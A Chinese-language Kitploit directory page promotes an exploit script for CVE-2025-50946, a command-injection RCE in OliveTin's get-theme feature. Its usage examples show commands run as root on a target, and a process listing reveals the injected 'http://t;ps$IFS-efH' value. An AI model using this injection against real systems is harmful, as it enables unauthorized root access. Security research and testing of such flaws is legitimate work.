Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-50946 — 针对 CVE-2025-50946 的漏洞利用脚本 | Kitploit
工具/GitHubGitHub/runt1me/cve-2025-50946
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubrunt1me/cve-2025-50946

cve-2025-50946

针对 CVE-2025-50946 的漏洞利用脚本

查看仓库
74个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2025-50946

CVE-2025-50946(OliveTin get-theme RCE)的漏洞利用脚本。字符要求非常苛刻,许多包含多个参数的命令可能无法正确执行。我没有花时间去追查根本原因,也没有尝试让脚本更健壮。如果你需要什么,请联系我或提交 PR。

鸣谢 chrisWalker11 的原始研究,本脚本基于此:链接

使用示例

基础 PoC:

python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload... 
uid=0(root) gid=0(root) groups=0(root)

进程列表(仅显示输出的一部分):

 python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload... 
UID          PID    PPID  C STIME TTY          TIME CMD
root           2       0  0 09:20 ?        00:00:00 [kthreadd]
root           1       0  0 09:20 ?        00:00:01 /sbin/init
root         313       1  0 09:20 ?        00:00:00   /usr/lib/systemd/systemd-journald
root         738       1  0 09:20 ?        00:00:00   /usr/sbin/cron -f -P
root         749       1  0 09:20 ?        00:00:00   /usr/local/bin/OliveTin
root        2167     749  0 13:26 ?        00:00:00     sh -c olivetin-get-theme http://t;ps$IFS-efH 
root        2168    2167  0 13:26 ?        00:00:00       ps -efH
下载工具